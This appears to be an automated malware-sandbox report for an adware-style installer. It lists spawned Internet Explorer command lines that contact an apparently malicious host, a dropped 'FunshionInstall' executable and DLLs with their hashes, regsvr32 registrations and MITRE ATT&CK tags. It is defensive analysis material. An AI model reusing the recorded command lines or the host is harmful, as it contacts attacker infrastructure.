"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a2&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
3⤵
- Modifies Internet Explorer settings
PID:4660

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a3&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
2⤵
- Suspicious use of WriteProcessMemory
PID:4356

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a3&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
3⤵
- Modifies Internet Explorer settings
PID:3464

C:\Users\Admin\AppData\Local\Temp\FunshionInstall_C105806.exe
C:\Users\Admin\AppData\Local\Temp\FunshionInstall_C105806.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3092

C:\Windows\SYSTEM32\regsvr32.exe
regsvr32.exe /s "C:\Windows\system32\quartz.dll"
3⤵
- Registers COM server for autorun
- Modifies registry class
PID:3424

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /s "C:\Windows\system32\quartz.dll"
3⤵
- Modifies registry class
PID:2204

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a4&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
2⤵
- Suspicious use of WriteProcessMemory
PID:4400

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a4&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
3⤵
- Modifies Internet Explorer settings
PID:3580

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a5&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
2⤵
- Suspicious use of WriteProcessMemory
PID:3296

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a5&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
3⤵
- Modifies Internet Explorer settings
PID:2140

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a6&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
2⤵
- Suspicious use of WriteProcessMemory
PID:2120

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a6&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
3⤵
- Modifies Internet Explorer settings
PID:4224

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a7&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
2⤵
- Suspicious use of WriteProcessMemory
PID:1716

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a7&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
3⤵
- Modifies Internet Explorer settings
PID:1632

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a8&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
2⤵
PID:2616

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a8&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
3⤵
- Modifies Internet Explorer settings
PID:5024

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a9&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
2⤵
PID:516

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a9&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
3⤵
- Modifies Internet Explorer settings
PID:1372

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\FunshionInstall_C105806.exe
Filesize
11.4MB

MD5
27e431909ee69665f003456ce3296aaa

SHA1
79655635a89e055f7594228dfbef3aa6bf8e381f

SHA256
22a2407ae9f95e79f2efa8516b92c9e89530ab2005ab308904484e3600d992fe

SHA512
4fdcacfde714c65964ceb1c9c3b8bb7e2ea94b0b285231facf43fcf2466a0e2741130c7ba04585ec5b6a673c40885f24627c372b6bcc3f18c8aaa5c882440b4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\FunshionInstall_C105806.exe
Filesize
11.4MB

MD5
27e431909ee69665f003456ce3296aaa

SHA1
79655635a89e055f7594228dfbef3aa6bf8e381f

SHA256
22a2407ae9f95e79f2efa8516b92c9e89530ab2005ab308904484e3600d992fe

SHA512
4fdcacfde714c65964ceb1c9c3b8bb7e2ea94b0b285231facf43fcf2466a0e2741130c7ba04585ec5b6a673c40885f24627c372b6bcc3f18c8aaa5c882440b4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\InetLoad.dll
Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\InetLoad.dll
Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\InetLoad.dll
Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\InetLoad.dll
Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\InetLoad.dll
Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\InetLoad.dll
Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\InetLoad.dll
Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\InetLoad.dll
Filesize
18KB

MD5
994669c5737b25c26642c94180e92fa2

SHA1
d8a1836914a446b0e06881ce1be8631554adafde

SHA256
bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c

SHA512
d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\Math.dll
Filesize
66KB

MD5
9eb6cecdd0df9fe32027fcdb51c625af

SHA1
52b5b054ff6e7325c3087822901ea2f2c4f9572a

SHA256
54cf1572ed47f614b0ffb886c99fc5725f454ef7ff919fbb2fd13d1cbe270560

SHA512
864742ec6f74f94057b54cd9b09707c0125ac8db4844fa80af201e8b72a811bb68276c993e75bce67e5ece4f83644572edbdee5e963634c5a37839615faea97a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\Math.dll
Filesize
66KB

MD5
9eb6cecdd0df9fe32027fcdb51c625af

SHA1
52b5b054ff6e7325c3087822901ea2f2c4f9572a

SHA256
54cf1572ed47f614b0ffb886c99fc5725f454ef7ff919fbb2fd13d1cbe270560

SHA512
864742ec6f74f94057b54cd9b09707c0125ac8db4844fa80af201e8b72a811bb68276c993e75bce67e5ece4f83644572edbdee5e963634c5a37839615faea97a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\System.dll
Filesize
11KB

MD5
00a0194c20ee912257df53bfe258ee4a

SHA1
d7b4e319bc5119024690dc8230b9cc919b1b86b2

SHA256
dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3

SHA512
3b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\inetc.dll
Filesize
20KB

MD5
50fdadda3e993688401f6f1108fabdb4

SHA1
04a9ae55d0fb726be49809582cea41d75bf22a9a

SHA256
6d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6

SHA512
e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\inetc.dll
Filesize
20KB

MD5
50fdadda3e993688401f6f1108fabdb4

SHA1
04a9ae55d0fb726be49809582cea41d75bf22a9a

SHA256
6d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6

SHA512
e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\inetc.dll
Filesize
20KB

MD5
50fdadda3e993688401f6f1108fabdb4

SHA1
04a9ae55d0fb726be49809582cea41d75bf22a9a

SHA256
6d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6

SHA512
e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\inetc.dll
Filesize
20KB

MD5
50fdadda3e993688401f6f1108fabdb4

SHA1
04a9ae55d0fb726be49809582cea41d75bf22a9a

SHA256
6d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6

SHA512
e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\time.dll
Filesize
10KB

MD5
38977533750fe69979b2c2ac801f96e6

SHA1
74643c30cda909e649722ed0c7f267903558e92a

SHA256
b4a95a455e53372c59f91bc1b5fb9e5c8e4a10a506fa04aaf7be27048b30ae35

SHA512
e17069395ad4a17e24f7cd3c532670d40244bd5ae3887c82e3b2e4a68c250cd55e2d8b329d6ff0e2d758955ab7470534e6307779e49fe331c1fd2242ea73fd53

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsj6A44.tmp\time.dll
Filesize
10KB

MD5
38977533750fe69979b2c2ac801f96e6

SHA1
74643c30cda909e649722ed0c7f267903558e92a

SHA256
b4a95a455e53372c59f91bc1b5fb9e5c8e4a10a506fa04aaf7be27048b30ae35

SHA512
e17069395ad4a17e24f7cd3c532670d40244bd5ae3887c82e3b2e4a68c250cd55e2d8b329d6ff0e2d758955ab7470534e6307779e49fe331c1fd2242ea73fd53

Download Submit
C:\Users\Admin\AppData\Local\Temp\tools\gma.dll
Filesize
484KB

MD5
0f35c14ffe3f0425e77099b618d6ebae

SHA1
6261ef267c3ea44a3698b73f207bc1f78f98c89d

SHA256
5a5a180569b9dc51e0a80405ee875e202a464cbe2ed712c86f3e79c0b61599ea

SHA512
7a166e8c79fb24e9b02f7f9e464d75c05dbfc6a428ce6067475520afaa84b999c4f9b701be91193b302eb3f024d6a2390c0fa4af5ec635ab6812aeb834dbde4f

Download Submit
memory/2152-138-0x00000000022C1000-0x00000000022C4000-memory.dmp

Filesize
12KB

Download
memory/2152-156-0x0000000000561000-0x0000000000563000-memory.dmp

Filesize
8KB

Download
memory/2152-153-0x0000000003C21000-0x0000000003C23000-memory.dmp

Filesize
8KB

Download
memory/2152-147-0x0000000003191000-0x0000000003193000-memory.dmp

Filesize
8KB

Download
memory/2152-144-0x00000000022C1000-0x00000000022C3000-memory.dmp

Filesize
8KB

Download
memory/2152-135-0x00000000022A0000-0x00000000022BA000-memory.dmp

Filesize
104KB

Download
memory/2204-161-0x0000000000000000-mapping.dmp

Download
memory/3092-157-0x0000000000000000-mapping.dmp

Download
memory/3424-160-0x0000000000000000-mapping.dmp

Download